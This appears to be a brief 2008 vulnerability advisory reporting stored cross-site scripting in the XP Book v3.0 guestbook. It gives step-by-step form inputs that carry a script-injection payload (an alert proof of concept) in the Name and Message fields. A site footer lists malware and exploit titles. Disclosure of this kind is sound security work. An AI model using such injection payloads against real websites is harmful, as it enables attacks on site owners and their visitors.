xpbook-xss.txt

Posted on 04 March 2008

Hello ,

I haven't send any new bugs for long time :)

Vulnerable : XP Book v3.0
coded by http://kuwaitiphp.alruban.net
* i think their website doesn't work at the moment

exploit :
open http://www.example.com/xpbook/entry.php

then type in
Name:
'><script>alert(xss);</script>
Email :
whatever@whatever.com

Message :
'><script>alert(xss);</script>

then press Send ! and the code that we typed is going to work !

discovered by / Linux_Drox
www.LeZr.Com

Best regards ,

TOP

Malware :

Borat RAT
Trojanized X_Trader
SnapMC
SunBird
Masslogger trojan

Last 20

Exploits :

Customer Support System 1.0 Cross Site Scripting
Xhibiter NFT Marketplace 1.10.2 SQL Injection
WordPress WPCode Lite 2.1.14 Cross Site Scripting
Azon Dominator Affiliate Marketing Script SQL Injection
Simple Laboratory Management System 1.0 SQL Injection

Last 20